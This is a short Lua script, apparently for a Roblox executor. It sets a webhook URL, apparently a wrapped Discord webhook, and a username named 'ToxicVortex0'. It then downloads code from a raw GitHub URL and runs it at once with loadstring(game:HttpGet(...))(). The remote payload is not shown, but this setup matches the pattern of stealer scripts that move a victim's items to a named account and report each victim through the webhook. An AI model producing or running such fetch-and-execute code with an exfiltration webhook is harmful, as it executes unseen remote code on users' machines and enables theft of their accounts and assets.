Webhook = "https://webhook-protect.vercel.app/api/webhook?id=Tjlyd3czYm5hY1ZPM3VyR1FCbDg0QTpXME4zRl9nUUFFcmhwaUtBelJDQVJZMDZHZF9fV09EeFdCS3VqMTlTSVFicndxVUxsZkVNeVNpNDFodHFhQnJTc1BkSVZLYUJYd2piaVlLSGU4MDVLOVl2bFhDUVdycWNfaFZSTC1uQnZHVFNaT3d0TjhNc20xVWFXVXk0MDVWbVdZYWQzdGMwUWZOWWFFRUZ1eWtlM3BNYUxFSkRrVUh0cTZxeUE4a1lNdEE"
Username = "ToxicVortex0"

loadstring(game:HttpGet("https://raw.githubusercontent.com/lelel22f/wow1/refs/heads/main/f222",true))()
